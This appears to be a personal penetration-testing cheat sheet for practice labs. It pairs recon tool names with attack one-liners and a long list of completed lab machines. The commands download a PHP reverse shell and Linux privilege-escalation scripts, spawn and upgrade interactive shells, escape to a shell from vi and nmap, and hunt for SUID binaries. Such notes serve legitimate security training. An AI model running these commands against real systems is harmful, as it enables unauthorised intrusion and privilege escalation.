             /~~88b                     888  e88~-_           
     e88~~\ |   888 888-~88e-~88e  e88~\888 d888     888-~88e 
    d888    `  d88P 888  888  888 d888  888 8888~~\  888  888 
    8888      d88P  888  888  888 8888  888 8888   | 888  888  
    Y888     d88P   888  888  888 Y888  888 Y888   | 888  888 
.----"88__/ d88P___ 888  888  888  "88_/888  "88__/  888  888----.        
|                   Z2V0IG9mZiBteSBsYXduIQ==                     |      															    	     														
'----------------------------------------------------------------'                 

::basics::
nmap
gobuster 
wfuzz
nikto 
enum4linux 

----

::phprev shell::
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

::spawn shell::
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within vi)
:!bash
:set shell=/bin/bash:shell
(From within nmap)
!sh

make things a little easier

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
Ctrl + Z [Background Process]
stty raw -echo ; fg ; reset

----

::privesc::
find / -perm -u=s -type f 2>/dev/null 
https://gtfobins.github.io

cat /etc/crontab
ls /etc/cron.*

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

----

::labs::
(86 - completed)

PLAY
::warm up::
BBSCute
CyberSploit1
Dawn
Dc-1
Dc-2
FunboxEasy
FunboxEasyEnum	
FunboxRookie
Gaara
Geisha	
Ha-natraj
Inclusiveness
InfosecPrep	
Katana	
Lampiao	
Monitoring
OnSystemShellDredd	
Photographer
Potato
PyExp
Sar	
Seppuku	
Shakabrah
Solstice
Sumo
SunsetDecoy
SunsetNoontide
Vegeta1
Wpwn

::get to work::
Assertion101
Born2Root
BtrSys2.1
Dc-4
Deception
Funbox
HAWordy
Loly
My-CMSMS
NoName
SoSimple
Stapler
SunsetMidnight
Tre
Y0usef

----

PRACTICE
::warm up::
Algernon
Bratarina
ClamAV
Exfiltrated
Exghost
Fantastic
Hawat
Helpdesk
Internal
Kevin
Metallus
Mice
Muddy
Pebbles
Pwned1
Twiggy
Wombo

::get to work::
Banzai
Breakout
Cassios
Catto
Chatty
Depreciated
Fail
G00g
Nibbles
Nukem
Pelican
Quackerjack
Readys
Roquefort
Snookums
Sona
Sorcerer
Walla
WebCal
XposedAPI
ZenPhoto
Zino

::try harder::
BlackGate
Peppo
Sirol


    _ 													 
   [_] ..LéGO!!										     
 /;   :\												     
()'---' C													 
  | | |													 
  [=|=] 
